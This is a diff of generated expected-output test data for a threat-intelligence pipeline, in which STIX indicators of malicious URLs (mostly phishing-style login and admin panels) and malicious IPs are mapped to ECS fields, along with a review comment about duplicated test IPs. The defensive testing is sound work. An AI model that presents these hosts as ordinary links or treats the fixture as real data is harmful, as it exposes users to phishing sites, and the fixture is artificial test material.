@@ -13831,7 +13831,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386358054Z", + "ingested": "2021-12-13T08:38:40.024150Z", "original": "{\"created\":\"2020-02-01T02:11:40.48Z\",\"description\":\"TS ID: 55277443247; iType: mal_url; State: active; Org: ServerMania; Source: CyberCrime\",\"id\":\"indicator--ede31398-e157-401a-9362-127f5c5983ce\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-01T02:11:40.48Z\",\"name\":\"mal_url: http://farzanatradings.com/fakedon/panel/admin.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://farzanatradings.com/fakedon/panel/admin.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:40.48Z\"}", "category": "threat", "type": "indicator", @@ -13882,7 +13882,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386362362Z", + "ingested": "2021-12-13T08:38:40.024157100Z", "original": "{\"created\":\"2020-02-01T02:11:41.88Z\",\"description\":\"TS ID: 55277443064; iType: mal_url; State: active; Org: Beget Ltd; Source: CyberCrime\",\"id\":\"indicator--297cf29f-42ad-44ac-9f04-5156899d5ce9\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-01T02:11:41.88Z\",\"name\":\"mal_url: http://q74722vp.beget.tech/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://q74722vp.beget.tech/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-01T02:11:41.88Z\"}", "category": "threat", "type": "indicator", 
@@ -13934,7 +13934,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386368223Z", + "ingested": "2021-12-13T08:38:40.024164200Z", "original": "{\"created\":\"2020-02-02T01:57:18.343Z\",\"description\":\"TS ID: 55280666668; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--194d8979-3fb6-4ebb-b7b1-d4758be6b32a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:18.343Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo1/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.343Z\"}", "category": "threat", "type": "indicator", @@ -13986,7 +13986,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386373012Z", + "ingested": "2021-12-13T08:38:40.024189Z", "original": "{\"created\":\"2020-02-02T01:57:18.366Z\",\"description\":\"TS ID: 55280666642; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--7470705a-310f-4fe9-9c2f-02b5eac2ff94\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:18.366Z\",\"name\":\"mal_url: http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/craks/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.366Z\"}", "category": "threat", "type": "indicator", 
@@ -14037,7 +14037,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386377480Z", + "ingested": "2021-12-13T08:38:40.024195700Z", "original": "{\"created\":\"2020-02-02T01:57:18.451Z\",\"description\":\"TS ID: 55280666607; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--20860e18-16e7-4a9a-a485-7588aaee909b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.451Z\",\"name\":\"mal_url: http://calmingvapors.com/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://calmingvapors.com/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.451Z\"}", "category": "threat", "type": "indicator", @@ -14089,7 +14089,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386381908Z", + "ingested": "2021-12-13T08:38:40.024199100Z", "original": "{\"created\":\"2020-02-02T01:57:18.605Z\",\"description\":\"TS ID: 55280666626; iType: mal_url; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--6d90d2cb-9fc8-43a4-b4c0-d9ab027f2268\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-87\"],\"modified\":\"2020-02-02T01:57:18.605Z\",\"name\":\"mal_url: http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://tonitrus.pw/3AX3AsO58eVAwtrm/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:18.605Z\"}", "category": "threat", "type": "indicator", 
@@ -14141,7 +14141,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386386487Z", + "ingested": "2021-12-13T08:38:40.024204300Z", "original": "{\"created\":\"2020-02-02T01:57:19.047Z\",\"description\":\"TS ID: 55280666671; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--ffc26af5-40e7-4157-9d15-cf6048ef86a4\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-85\"],\"modified\":\"2020-02-02T01:57:19.047Z\",\"name\":\"mal_url: http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://sino-spriulina.com/demo/Panel/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.047Z\"}", "category": "threat", "type": "indicator", @@ -14192,7 +14192,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386390785Z", + "ingested": "2021-12-13T08:38:40.024209600Z", "original": "{\"created\":\"2020-02-02T01:57:19.068Z\",\"description\":\"TS ID: 55280666596; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--5c4cfe56-5fda-4c2b-9b8c-3d384988c3ac\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:57:19.068Z\",\"name\":\"mal_url: http://f0392879.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0392879.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:19.068Z\"}", "category": "threat", "type": "indicator", 
@@ -14244,7 +14244,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386395313Z", + "ingested": "2021-12-13T08:38:40.024215700Z", "original": "{\"created\":\"2020-02-02T01:57:25.701Z\",\"description\":\"TS ID: 55280666633; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--8fdc4cfc-1312-4f6c-99ce-3a0a582a07d3\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-80\"],\"modified\":\"2020-02-02T01:57:25.701Z\",\"name\":\"mal_url: http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://expertisem.net/agutaz/direct/pushin/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.701Z\"}", "category": "threat", "type": "indicator", @@ -14296,7 +14296,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386399832Z", + "ingested": "2021-12-13T08:38:40.024219500Z", "original": "{\"created\":\"2020-02-02T01:57:25.838Z\",\"description\":\"TS ID: 55280666656; iType: mal_url; State: active; Org: State Research Center of the Russian Federation; Source: CyberCrime\",\"id\":\"indicator--9d8a164e-4f04-4ad2-a1a5-9c4dea319b97\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-88\"],\"modified\":\"2020-02-02T01:57:25.838Z\",\"name\":\"mal_url: http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gpi-q.com/copy/five/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:25.838Z\"}", "category": "threat", "type": "indicator", 
@@ -14347,7 +14347,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386404381Z", + "ingested": "2021-12-13T08:38:40.024224800Z", "original": "{\"created\":\"2020-02-02T01:57:29.827Z\",\"description\":\"TS ID: 55280666597; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--001b0157-c446-40fd-8e01-136a2cab433f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-65\"],\"modified\":\"2020-02-02T01:57:29.827Z\",\"name\":\"mal_url: http://f0391832.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391832.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:29.827Z\"}", "category": "threat", "type": "indicator", @@ -14398,7 +14398,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386409039Z", + "ingested": "2021-12-13T08:38:40.024229400Z", "original": "{\"created\":\"2020-02-02T01:57:48.75Z\",\"description\":\"TS ID: 55280666598; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4c7c0429-b6f8-4376-8d84-18d68d212b34\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:57:48.75Z\",\"name\":\"mal_url: http://f0391281.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0391281.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:57:48.75Z\"}", "category": "threat", "type": "indicator", 
@@ -14449,7 +14449,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386413638Z", + "ingested": "2021-12-13T08:38:40.024233500Z", "original": "{\"created\":\"2020-02-02T01:58:23.948Z\",\"description\":\"TS ID: 55280666593; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--4eeed5f1-092b-4a3f-8c54-f5eb87b5a19c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T01:58:23.948Z\",\"name\":\"mal_url: http://f0393735.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393735.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:23.948Z\"}", "category": "threat", "type": "indicator", @@ -14501,7 +14501,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386418357Z", + "ingested": "2021-12-13T08:38:40.024237900Z", "original": "{\"created\":\"2020-02-02T01:58:44.041Z\",\"description\":\"TS ID: 55280666689; iType: mal_url; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--c253cabd-5a52-4b5f-a53f-94ca58ee3f60\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-94\"],\"modified\":\"2020-02-02T01:58:44.041Z\",\"name\":\"mal_url: http://gerawest.xyz/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://gerawest.xyz/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:44.041Z\"}", "category": "threat", "type": "indicator", 
@@ -14552,7 +14552,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386422835Z", + "ingested": "2021-12-13T08:38:40.024241400Z", "original": "{\"created\":\"2020-02-02T01:58:54.099Z\",\"description\":\"TS ID: 55280666701; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--0bb2320f-9a03-4375-ad2a-10b5d3c41b36\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-73\"],\"modified\":\"2020-02-02T01:58:54.099Z\",\"name\":\"mal_url: http://f0387404.xsph.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0387404.xsph.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:58:54.099Z\"}", "category": "threat", "type": "indicator", @@ -14603,7 +14603,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386427163Z", + "ingested": "2021-12-13T08:38:40.024246400Z", "original": "{\"created\":\"2020-02-02T01:59:11.446Z\",\"description\":\"TS ID: 55280666697; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--f6198f5d-4056-4b4f-8ab7-d9b82ec4878b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T01:59:11.446Z\",\"name\":\"mal_url: http://j1040794.myjino.ru/\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://j1040794.myjino.ru/']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:11.446Z\"}", "category": "threat", "type": "indicator", 
@@ -14654,7 +14654,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386431932Z", + "ingested": "2021-12-13T08:38:40.024252500Z", "original": "{\"created\":\"2020-02-02T01:59:24.665Z\",\"description\":\"TS ID: 55280666589; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--60d7cde7-6852-4295-8399-81b21cc74d7a\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-62\"],\"modified\":\"2020-02-02T01:59:24.665Z\",\"name\":\"mal_url: http://f0395171.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0395171.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T01:59:24.665Z\"}", "category": "threat", "type": "indicator", @@ -14673,7 +14673,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_url: http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php", + "name": "mal_url: http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php", "description": "TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime", "modified": "2020-02-02T02:00:11.839Z", "valid_from": "2020-02-02T02:00:11.839Z", 
@@ -14698,16 +14698,16 @@ "url": { "path": "/yvE9cDkW1l7pXwt5/login.php", "extension": "php", - "original": "http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php", + "original": "http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php", "scheme": "http", - "domain": "5.188.60.203", - "full": "http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php" + "domain": "89.160.20.156", + "full": "http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php" } } }, "event": { - "ingested": "2021-12-13T05:57:34.386436431Z", - "original": "{\"created\":\"2020-02-02T02:00:11.839Z\",\"description\":\"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:11.839Z\",\"name\":\"mal_url: http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://5.188.60.203/yvE9cDkW1l7pXwt5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:11.839Z\"}", + "ingested": "2021-12-13T08:38:40.024258800Z", + "original": "{\"created\":\"2020-02-02T02:00:11.839Z\",\"description\":\"TS ID: 55280666629; iType: mal_url; State: active; Org: MoreneHost; Source: CyberCrime\",\"id\":\"indicator--f31af3ce-1dfe-4846-8f78-cc0f5e73dd2f\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:11.839Z\",\"name\":\"mal_url: http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://89.160.20.156/yvE9cDkW1l7pXwt5/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:11.839Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -14758,7 +14758,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386440729Z", + "ingested": "2021-12-13T08:38:40.024265900Z", "original": "{\"created\":\"2020-02-02T02:00:15.667Z\",\"description\":\"TS ID: 55280666662; iType: mal_url; State: active; Org: Limited liability company Mail.Ru; Source: CyberCrime\",\"id\":\"indicator--f6bd5b3a-7b17-4b33-a487-1d47f9ffa62b\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-74\"],\"modified\":\"2020-02-02T02:00:15.667Z\",\"name\":\"mal_url: http://nortonlilly.info/boss/login.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://nortonlilly.info/boss/login.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:15.667Z\"}", "category": "threat", "type": "indicator", @@ -14809,7 +14809,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386445117Z", + "ingested": "2021-12-13T08:38:40.024273Z", "original": "{\"created\":\"2020-02-02T02:00:31.866Z\",\"description\":\"TS ID: 55280666667; iType: mal_url; State: active; Org: Avguro Technologies Ltd. Hosting service provider; Source: CyberCrime\",\"id\":\"indicator--bc1481fa-a858-4a87-9ef6-8844ace2dbed\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-67\"],\"modified\":\"2020-02-02T02:00:31.866Z\",\"name\":\"mal_url: http://ildar-mael-ru.myjino.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://ildar-mael-ru.myjino.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.866Z\"}", "category": "threat", "type": "indicator", 
@@ -14861,7 +14861,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386449826Z", + "ingested": "2021-12-13T08:38:40.024280100Z", "original": "{\"created\":\"2020-02-02T02:00:31.895Z\",\"description\":\"TS ID: 55280666659; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--e441cd63-5660-465f-a299-b035d8276ff6\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-86\"],\"modified\":\"2020-02-02T02:00:31.895Z\",\"name\":\"mal_url: http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://butland.cf/sabali/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:31.895Z\"}", "category": "threat", "type": "indicator", @@ -14880,7 +14880,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 85.117.234.217", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime", "modified": "2020-02-02T02:00:38.587Z", "valid_from": "2020-02-02T02:00:38.587Z", 
@@ -14902,12 +14902,12 @@ "first_seen": "2020-02-02T02:00:38.587Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "85.117.234.217" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386454054Z", - "original": "{\"created\":\"2020-02-02T02:00:38.587Z\",\"description\":\"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--f83c3853-4de3-4139-8076-a598265f453c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-02T02:00:38.587Z\",\"name\":\"mal_ip: 85.117.234.217\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '85.117.234.217']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.587Z\"}", + "ingested": "2021-12-13T08:38:40.024287100Z", + "original": "{\"created\":\"2020-02-02T02:00:38.587Z\",\"description\":\"TS ID: 55280666644; iType: mal_ip; State: active; Source: CyberCrime\",\"id\":\"indicator--f83c3853-4de3-4139-8076-a598265f453c\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-54\"],\"modified\":\"2020-02-02T02:00:38.587Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.587Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
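Review bot: Every `ipv4-addr` indicator in this file now carries the same `threat.indicator.ip` value, so the `"ip": "89.160.20.156"` line in this hunk is no longer distinguishable from the ones at the `-15050`, `-15095`, `-15140`, `-15391` and `-15904` hunks, even though each keeps its own `indicator--` id and a different `Org:` in `description`. A regression that copied the wrong event's IP into `threat.indicator.ip` or `pattern` would now pass this expected output unchanged, which weakens what the fixture proves about the pipeline. If the supported test range offers more than one address, consider giving each `mal_ip` indicator a distinct one in the input events and regenerating; since the `ingested` timestamps in this file change with every regeneration, this looks like generated expected output and the edit belongs in the source events rather than here.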
@@ -14957,7 +14957,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386458382Z", + "ingested": "2021-12-13T08:38:40.024294100Z", "original": "{\"created\":\"2020-02-02T02:00:38.657Z\",\"description\":\"TS ID: 55280666595; iType: mal_url; State: active; Org: SPRINTHOST.RU - shared/premium hosting, VDS, dedic; Source: CyberCrime\",\"id\":\"indicator--374e400c-0db7-4e0d-b533-5b6653178da0\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-71\"],\"modified\":\"2020-02-02T02:00:38.657Z\",\"name\":\"mal_url: http://f0393257.xsph.ru/login\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://f0393257.xsph.ru/login']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:38.657Z\"}", "category": "threat", "type": "indicator", @@ -15009,7 +15009,7 @@ } }, "event": { - "ingested": "2021-12-13T05:57:34.386462740Z", + "ingested": "2021-12-13T08:38:40.024301Z", "original": "{\"created\":\"2020-02-02T02:00:44.275Z\",\"description\":\"TS ID: 55280666609; iType: mal_url; State: active; Org: Cloudflare; Source: CyberCrime\",\"id\":\"indicator--6a115b32-72cb-4397-9550-28bd809ff522\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:00:44.275Z\",\"name\":\"mal_url: http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[url:value = 'http://amotach-cn.com/DOTNETXXX/PvqDq929BSx_A_D_M1n_a.php']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:00:44.275Z\"}", "category": "threat", "type": "indicator", 
@@ -15028,7 +15028,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 46.17.175.204", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime", "modified": "2020-02-02T02:01:03.981Z", "valid_from": "2020-02-02T02:01:03.981Z", @@ -15050,12 +15050,12 @@ "first_seen": "2020-02-02T02:01:03.981Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "46.17.175.204" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386467469Z", - "original": "{\"created\":\"2020-02-02T02:01:03.981Z\",\"description\":\"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-02T02:01:03.981Z\",\"name\":\"mal_ip: 46.17.175.204\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '46.17.175.204']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:03.981Z\"}", + "ingested": "2021-12-13T08:38:40.024308200Z", + "original": "{\"created\":\"2020-02-02T02:01:03.981Z\",\"description\":\"TS ID: 55280666694; iType: mal_ip; State: active; Org: Hostinger International Limited; Source: CyberCrime\",\"id\":\"indicator--7c6e0ed1-51a4-460c-a69a-75ce73db8961\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-52\"],\"modified\":\"2020-02-02T02:01:03.981Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '89.160.20.156']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:03.981Z\"}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -15073,7 +15073,7 @@ "object_marking_refs": [ "marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da" ], - "name": "mal_ip: 47.90.215.148", + "name": "mal_ip: 89.160.20.156", "description": "TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime", "modified": "2020-02-02T02:01:09.238Z", "valid_from": "2020-02-02T02:01:09.238Z", @@ -15095,12 +15095,12 @@ "first_seen": "2020-02-02T02:01:09.238Z", "type": "ipv4-addr", "provider": "CyberCrime", - "ip": "47.90.215.148" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T05:57:34.386471937Z", - "original": "{\"created\":\"2020-02-02T02:01:09.238Z\",\"description\":\"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:01:09.238Z\",\"name\":\"mal_ip: 47.90.215.148\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = '47.90.215.148']\",\"type\":\"indicator\",\"valid_from\":\"2020-02-02T02:01:09.238Z\"}", + "ingested": "2021-12-13T08:38:40.024315100Z", + "original": "{\"created\":\"2020-02-02T02:01:09.238Z\",\"description\":\"TS ID: 55280666627; iType: mal_ip; State: active; Org: Alibaba; Source: CyberCrime\",\"id\":\"indicator--c5225c57-2cfd-4cd4-873a-068d5577959e\",\"labels\":[\"malicious-activity\",\"threatstream-severity-medium\",\"threatstream-confidence-83\"],\"modified\":\"2020-02-02T02:01:09.238Z\",\"name\":\"mal_ip: 89.160.20.156\",\"object_marking_refs\":[\"marking-definition--34098fce-860f-48ae-8e50-ebd3cc5e41da\"],\"pattern\":\"[ipv4-addr:value = 